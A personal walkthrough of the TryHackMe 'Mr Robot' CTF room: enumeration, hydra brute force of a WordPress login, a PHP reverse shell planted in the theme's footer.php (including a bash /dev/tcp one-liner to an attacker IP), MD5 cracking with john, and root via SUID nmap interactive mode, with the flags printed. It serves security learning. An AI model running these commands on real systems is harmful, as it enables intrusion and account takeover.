MR Robot
Description
These are my notes for the Mr Robot CTF Room on TryHackMe.
Note: Task #1 is to deploy the machine.
| OS | Level | Rating |
|---|---|---|
| CTF | N/A | 5/5 |
KEY LEARNINGSβ
tip
I think given enough of these boxes, I need to have "ON HAND AT ALL TIMES":
- nmap lines ready
- gobuster lines ready (also enumerate results properly)
- key webapp testing checklist e.g. robots.txt
- hydra lines ready
- php reverse shell setup technique i.e. wp-admin foothold, theme editor, pentestmonkey reverse php page
- john cracking lines ready
- linux enumeration lines ready e.g. find suids
RECONβ
NMAPβ
the "all in one":
sudo nmap -v 10.10.235.193 -Pn -p- -sC -sV -O --min-rate=5000 -o nmap-mr_robot.txt
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after: 2025-09-13T10:45:03
| MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97
|_SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
Device type: general purpose|specialized|storage-misc|broadband router|printer|WAP
Running (JUST GUESSING): Linux 3.X|4.X|5.X|2.6.X (91%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:5.4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.5 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Crestron XPanel control system (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.000 days (since Sat Apr 2 21:59:23 2022)
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
GOBUSTERβ
gobuster dir -e -u http://10.10.235.193 -w /usr/share/wordlists/dirb/common.txt -o gobuster-mr_robot.txt
http://10.10.235.193/.hta (Status: 403) [Size: 213]
http://10.10.235.193/.htaccess (Status: 403) [Size: 218]
http://10.10.235.193/.htpasswd (Status: 403) [Size: 218]
http://10.10.235.193/0 (Status: 301) [Size: 0] [--> http://10.10.235.193/0/]
http://10.10.235.193/admin (Status: 301) [Size: 235] [--> http://10.10.235.193/admin/]
http://10.10.235.193/atom (Status: 301) [Size: 0] [--> http://10.10.235.193/feed/atom/]
http://10.10.235.193/audio (Status: 301) [Size: 235] [--> http://10.10.235.193/audio/]
http://10.10.235.193/blog (Status: 301) [Size: 234] [--> http://10.10.235.193/blog/]
http://10.10.235.193/css (Status: 301) [Size: 233] [--> http://10.10.235.193/css/]
http://10.10.235.193/dashboard (Status: 302) [Size: 0] [--> http://10.10.235.193/wp-admin/]
http://10.10.235.193/favicon.ico (Status: 200) [Size: 0]
http://10.10.235.193/feed (Status: 301) [Size: 0] [--> http://10.10.235.193/feed/]
http://10.10.235.193/image (Status: 301) [Size: 0] [--> http://10.10.235.193/image/]
http://10.10.235.193/Image (Status: 301) [Size: 0] [--> http://10.10.235.193/Image/]
http://10.10.235.193/images (Status: 301) [Size: 236] [--> http://10.10.235.193/images/]
http://10.10.235.193/index.html (Status: 200) [Size: 1077]
http://10.10.235.193/index.php (Status: 301) [Size: 0] [--> http://10.10.235.193/]
http://10.10.235.193/intro (Status: 200) [Size: 516314]
http://10.10.235.193/js (Status: 301) [Size: 232] [--> http://10.10.235.193/js/]
http://10.10.235.193/license (Status: 200) [Size: 309]
http://10.10.235.193/login (Status: 302) [Size: 0] [--> http://10.10.235.193/wp-login.php]
http://10.10.235.193/page1 (Status: 301) [Size: 0] [--> http://10.10.235.193/]
http://10.10.235.193/phpmyadmin (Status: 403) [Size: 94]
http://10.10.235.193/rdf (Status: 301) [Size: 0] [--> http://10.10.235.193/feed/rdf/]
http://10.10.235.193/readme (Status: 200) [Size: 64]
http://10.10.235.193/robots (Status: 200) [Size: 41]
http://10.10.235.193/robots.txt (Status: 200) [Size: 41]
http://10.10.235.193/rss (Status: 301) [Size: 0] [--> http://10.10.235.193/feed/]
http://10.10.235.193/rss2 (Status: 301) [Size: 0] [--> http://10.10.235.193/feed/]
http://10.10.235.193/sitemap (Status: 200) [Size: 0]
http://10.10.235.193/sitemap.xml (Status: 200) [Size: 0]
http://10.10.235.193/video (Status: 301) [Size: 235] [--> http://10.10.235.193/video/]
http://10.10.235.193/wp-admin (Status: 301) [Size: 238] [--> http://10.10.235.193/wp-admin/]
http://10.10.235.193/wp-content (Status: 301) [Size: 240] [--> http://10.10.235.193/wp-content/]
http://10.10.235.193/wp-includes (Status: 301) [Size: 241] [--> http://10.10.235.193/wp-includes/]
http://10.10.235.193/wp-config (Status: 200) [Size: 0]
http://10.10.235.193/wp-cron (Status: 200) [Size: 0]
http://10.10.235.193/wp-links-opml (Status: 200) [Size: 227]
http://10.10.235.193/wp-login (Status: 200) [Size: 2642]
http://10.10.235.193/wp-load (Status: 200) [Size: 0]
http://10.10.235.193/wp-mail (Status: 500) [Size: 3064]
http://10.10.235.193/wp-settings (Status: 500) [Size: 0]
http://10.10.235.193/wp-signup (Status: 302) [Size: 0] [--> http://10.10.235.193/wp-login.php?action=register]
http://10.10.235.193/xmlrpc (Status: 405) [Size: 42]
http://10.10.235.193/xmlrpc.php (Status: 405) [Size: 42]
FLAG 1β
Website running on port 80, so let's browse.
found: http://10.10.235.193/robots.txt
robots.txtβ
User-agent: *
fsocity.dic
key-1-of-3.txt
found: http://10.10.235.193/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
downloaded fsocity.dic file.
FLAG 2β
idea
use hydra + fsocity.dic file to brute force the wp-admin login page.
Brute-forceβ
Use hydra and the fsocity.dic file to brute-force the login.
Format: hydra -l <login> -P <path/to/wordlist> <ip> <module> '/path/to/login.php:login-request&password=^PASS^:failure-message'
I use the following payload to set password as fixed and run through the ./fsocity.dic file to find valid username i.e. when you get a response that doesn't get Invalid username returned:
payload: hydra -L ./fsocity.dic -p password 10.10.235.193 -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username'
hydra -L ./fsocity.dic -p password 10.10.235.193 -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username'
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations
, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-02 23:02:35
[DATA] max 16 tasks per 1 server, overall 16 tasks, 858235 login tries (l:858235/p:1), ~53640 tries per task
[DATA] attacking http-post-form://10.10.235.193:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:Invalid username
[ATTEMPT] target 10.10.235.193 - login "true" - pass "password" - 1 of 858235 [child 0] (0/0)
[ATTEMPT] target 10.10.235.193 - login "false" - pass "password" - 2 of 858235 [child 1] (0/0)
[ATTEMPT] target 10.10.235.193 - login "wikia" - pass "password" - 3 of 858235 [child 2] (0/0)
[ATTEMPT] target 10.10.235.193 - login "from" - pass "password" - 4 of 858235 [child 3] (0/0)
[ATTEMPT] target 10.10.235.193 - login "the" - pass "password" - 5 of 858235 [child 4] (0/0)
[ATTEMPT] target 10.10.235.193 - login "now" - pass "password" - 6 of 858235 [child 5] (0/0)
[ATTEMPT] target 10.10.235.193 - login "Wikia" - pass "password" - 7 of 858235 [child 6] (0/0)
[ATTEMPT] target 10.10.235.193 - login "extensions" - pass "password" - 8 of 858235 [child 7] (0/0)
[ATTEMPT] target 10.10.235.193 - login "scss" - pass "password" - 9 of 858235 [child 8] (0/0)
[ATTEMPT] target 10.10.235.193 - login "window" - pass "password" - 10 of 858235 [child 9] (0/0)
[ATTEMPT] target 10.10.235.193 - login "http" - pass "password" - 11 of 858235 [child 10] (0/0)
[ATTEMPT] target 10.10.235.193 - login "var" - pass "password" - 12 of 858235 [child 11] (0/0)
[ATTEMPT] target 10.10.235.193 - login "page" - pass "password" - 13 of 858235 [child 12] (0/0)
[ATTEMPT] target 10.10.235.193 - login "Robot" - pass "password" - 14 of 858235 [child 13] (0/0)
[ATTEMPT] target 10.10.235.193 - login "Elliot" - pass "password" - 15 of 858235 [child 14] (0/0)
[ATTEMPT] target 10.10.235.193 - login "styles" - pass "password" - 16 of 858235 [child 15] (0/0)
[ATTEMPT] target 10.10.235.193 - login "and" - pass "password" - 17 of 858235 [child 0] (0/0)
[ATTEMPT] target 10.10.235.193 - login "document" - pass "password" - 18 of 858235 [child 1] (0/0)
[ATTEMPT] target 10.10.235.193 - login "mrrobot" - pass "password" - 19 of 858235 [child 2] (0/0)
[ATTEMPT] target 10.10.235.193 - login "com" - pass "password" - 20 of 858235 [child 3] (0/0)
[ATTEMPT] target 10.10.235.193 - login "ago" - pass "password" - 21 of 858235 [child 4] (0/0)
[ATTEMPT] target 10.10.235.193 - login "function" - pass "password" - 22 of 858235 [child 5] (0/0)
[ATTEMPT] target 10.10.235.193 - login "eps1" - pass "password" - 23 of 858235 [child 7] (0/0)
[ATTEMPT] target 10.10.235.193 - login "null" - pass "password" - 24 of 858235 [child 6] (0/0)
[ATTEMPT] target 10.10.235.193 - login "chat" - pass "password" - 25 of 858235 [child 8] (0/0)
[ATTEMPT] target 10.10.235.193 - login "user" - pass "password" - 26 of 858235 [child 9] (0/0)
[ATTEMPT] target 10.10.235.193 - login "Special" - pass "password" - 27 of 858235 [child 11] (0/0)
[ATTEMPT] target 10.10.235.193 - login "GlobalNavigation" - pass "password" - 28 of 858235 [child 10] (0/0)
[ATTEMPT] target 10.10.235.193 - login "images" - pass "password" - 29 of 858235 [child 12] (0/0)
[ATTEMPT] target 10.10.235.193 - login "net" - pass "password" - 30 of 858235 [child 13] (0/0)
[80][http-post-form] host: 10.10.235.193 login: Elliot password: password # <------ bingo!
[ATTEMPT] target 10.10.235.193 - login "push" - pass "password" - 31 of 858235 [child 14] (0/0)
now try again, but set username to Elliot and cycle through the ./fsocity.dic file in the password field (change the error message)
hydra -l Elliot -P ./fsocity.dic 10.10.235.193 -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:The password you entered for the username' -o hydra-password.txt
Got a valid username, but no luck on the password.
tip
hint from walkthrough: /license.
hint from THM "white coloured font".
I look through the gobuster results again and see this http://10.10.243.224/license
I visit this page and see this:
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
But if you inspect it and you see the hidden text:
do you want a password or something? ZWxsaW90OkVSMjgtMDY1Mgo=
looks base64:
442 π Β± β€ echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d
elliot:ER28-0652
Now, I'm thinking "PHP reverse shell" to get a foothold.
Reverse Shellβ
From highon.coffee
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>
payload
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"10.11.55.83"/443 0>&1'");?>
this one kept loading/freezing, need to tweak it maybe.
this person has some great notes n0a110w and from their blog I ended up using [pentestmonkey php reverse shell](git clone https://github.com/pentestmonkey/php-reverse-shell.git).
tip
We need to be able to edit php source code, not html pages, so you need to hit the editor in the Theme section. I replaced the entire footer.php file with the pentestmonkey reverse shell file.
I created a random page called shell in the wordpress add page menu, so I know the footer.php gets loaded, "view page" and you pop the shell:
443 π Β± β€ sudo rlwrap nc -lvrp 443
listening on [any] 443 ...
10.10.243.224: inverse host lookup failed: Unknown host
connect to [10.11.55.83] from (UNKNOWN) [10.10.243.224] 51517
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
00:09:03 up 1:45, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$
stabilize with python
$
which python
/usr/bin/python
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$
find the flag
ls
ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
cd /home
cd /home
ls
ls
robot
cd robot
cd robot
ls
ls
key-2-of-3.txt password.raw-md5
cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
ls -al
ls -al
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
id;whoami
id;whoami
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon
daemon@linux:/home/robot$
found /home/robot flag, can't read flag, but can read the other file:
ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$
Crackβ
copied this password.raw-md5 to my local to crack with john.
RxHackk η¦ ~/Repos/RxHack/THM/OFFENSIVEPENTESTPATH/MR_ROBOT/crack β€ a14b989|mainβ‘
458 π Β± β€ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt md5.hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefghijklmnopqrstuvwxyz (robot)
1g 0:00:00:02 DONE (2022-04-03 12:21) 0.4975g/s 20155p/s 20155c/s 20155C/s bonjour1..123092
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
RxHackk η¦ ~/Repos/RxHack/THM/OFFENSIVEPENTESTPATH/MR_ROBOT/crack β€ a14b989|mainβ‘
459 π Β± β€ john --show
Password files required, but none specified
RxHackk η¦ ~/Repos/RxHack/THM/OFFENSIVEPENTESTPATH/MR_ROBOT/crack β€ a14b989|mainβ‘
460 π Β± β€ john --show md5.hash
0 password hashes cracked, 2 left
RxHackk η¦ ~/Repos/RxHack/THM/OFFENSIVEPENTESTPATH/MR_ROBOT/crack β€ a14b989|mainβ‘
461 π Β± β€ john --show --format=Raw-MD5 md5.hash
robot:abcdefghijklmnopqrstuvwxyz
1 password hash cracked, 0 left
privesc: userβ
su to robot user and get the flag
su - robot
su - robot
abcdefghijklmnopqrstuvwxyz
id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$
FLAG 3β
back into the box, reverse php page, su to robot user:
444 π Β± β€ sudo rlwrap nc -lvrp 443
listening on [any] 443 ...
10.10.77.167: inverse host lookup failed: Unknown host
connect to [10.11.55.83] from (UNKNOWN) [10.10.77.167] 56597
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
00:29:34 up 3 min, 0 users, load average: 0.35, 0.38, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
su - robot
su - robot
abcdefghijklmnopqrstuvwxyz
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
robot@linux:~$
robot@linux:~$
ls -al
ls -al
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
suidsβ
try find SUIDs
find / -perm /4000
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
find: `/etc/ssl/private': Permission denied
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
find: `/root': Permission denied
nmap interactiveβ
I intially looked at /usr/lib/pt_chown but the THM hint said "nmap", and I can see it there /usr/local/bin/nmap
nmap has an "interactive mode" that "! <command> -- runs shell command given in the foreground"
ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
/usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
sh
sh
Unknown command (sh) -- press h <enter> for help
h
h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish. Results are printed to the
screen (of course you can still use file output commands).
! <command> -- runs shell command given in the foreground
x -- Exit Nmap
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen). You should generally specify a
file for results (with -oX, -oG, or -oN). If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings. If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h -- Obtain help with Nmap syntax
h -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24
!sh
!sh
id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
#
flag 3
ls /root
firstboot_done key-3-of-3.txt
cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4